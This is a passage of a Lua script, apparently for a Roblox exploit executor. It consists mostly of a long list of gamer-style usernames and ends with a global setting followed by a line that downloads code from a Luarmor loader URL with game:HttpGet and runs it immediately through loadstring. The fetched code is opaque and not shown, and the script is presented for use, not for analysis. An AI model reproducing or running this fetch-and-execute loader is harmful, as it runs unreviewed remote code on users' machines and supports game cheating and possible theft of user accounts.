"Mast3rCircuitCooki32",
"Jax0nC00ki3Lucky2018",
"LunaHaz3Gold3n2007",
"Gabri3lZap2007",
"PrimalSkat3r2023",
"Mat3oPho3nixB3ar",
"PrimalSkater56",
"ByteGoldenThunder",
"RocketNinjaSlime",
"Z3r0_Rift39",
"AmeliaLi0nCrystal",
"Xx_StreamFusionGamer",
"S0nicCraze56",
"XxGolden_FoxxX2011",
"B3arRid3rCircuit",
"V3nomDarkCyb3r2016",
"DuckJellyMoon2012",
"XxSparkly_TOXICXX16Y",
"IceSparkGalaxy",
"NovaZap15",
"SlimeN0va2020",
"Cha0s_Ph0enix2018",
"JELLYBLADEICE_YT",
"Bac0nBl0ck2020",
"BeastCyberGiga2007",
"Ev3lynDragon2024",
"Rogue_BUILDER55",
"Savannah_BEAST17",
"BlizzardBlaze80",
"MateoByteMoon",
"CookieChaseBlizzard",
"RogueEchoFox",
"Aur0raQueenUltra",
"NinjaHyp3rEpic",
"LaylaSkyFury2023",
"ThunderTurb0Cha0s",
"WillowDriftMagic2021",
"Br00klynBlaze2003YT",
"LionPow3r52",
"XxProSonicNeonxX2007",
"NoahVenomFury2008",
"ByteLucky86",
"ArrowGlitchQueen",
"Charl0tt3Turb0Magic",
"ShadowChillDark",
"BuilderBaneDuck",
"Sonic_Lucky73",
"StormySkyHunt3r",
"EthanSkat3r51",
"Hunt3rEchoZ3ro90",
"Ech0_Fury201924",
"OwenBlizzard43",
"BaneHeroZap",
"Ev3lynPuls3Thund3r",
"XX_CrystalStealthDaw",
"VortexMaxHawk23",
"Hunter_Slime87",
"ToxicJelly2010",
"SlimeStarSky201954_Y",
"XxAidenRocketxX20206",
"Starry_EAGL3202370",
"XxLogan_JELLYXX2007",
"G0ld3nN0vaDanc3r2012",
"VIP3R_Pix3l2009",
"PixelatedPrimal24",
"BytePixelHyper2020",
"S3bastianKing52",
"GoldenPowerFlame",
"ZoeLucky30YT",
"XxSamu3lToxicWolfxX",
"Luk3PlayzGold3n67",
"HyperW0lfNight",
"Rav3nCraftGlitch",
"Her0Star2019",
"XxPaisleySlimePhoeni",
"R0gu3SkyGiga",
"WillowVortex202241",
"SparkClawZero2023",
"SavannahN3onByt3",
"JaxonVortexFire",
"GabrielPrimal91",
"LuckyEcho58",
"MinerUltraCircuit14",
"BlockInferno59",
"AvaPow3rOrbit",
"ZapCraftCode",
"CraftStarBlade_YT",
"XxHazeGamerxX2010",
"NoraPulseStormyYT",
"Xx_StealthShad0wHawk",
"MoonSkaterMiner",
"WilliamKnightFir3",
"JaxonPixel24",
"JulianBane86",
"StarrySlime201630",
"Lava_Circuit56",
"JacksonSparklyMagic4",
"Thund3r_Build3r56",
"XxAubrey_RavenxX2015",
"XxMiaCookiexX78_YT",
"ChaosAceBane2017",
"EthanBlastSpark98",
"Paisl3yPix3lDuck2014",
"BlizzardTurbo45",
"JAM3S_Night2022",
"SparkPro18",
"XxAubr3yVip3rxX32",
"P0w3rEch02009",
"St0rmyBl0ck2004",
"Jaxon_Pixelated20126",
"PrimalSilverQueen",
"C00kie_Lucky2003",
"SavannahNinjaEagle20",
"Primal_Starry42",
"Sparkly_Zap93",
"Prism_Light31",
"Riley_EAGLE2011",
"XxChl0ePr0DancerxX20",
"CookieZap2018",
"Ph0enixAlphaN0va54",
"VENOM_Epic97",
"KnightRogu3Pix3l2004",
"SamuelLightHer02014",
}

_G.GMAIL_DELAY  = 0
loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/8f386eb537ee7b37a8f0ad37fe6dbc60.lua"))()
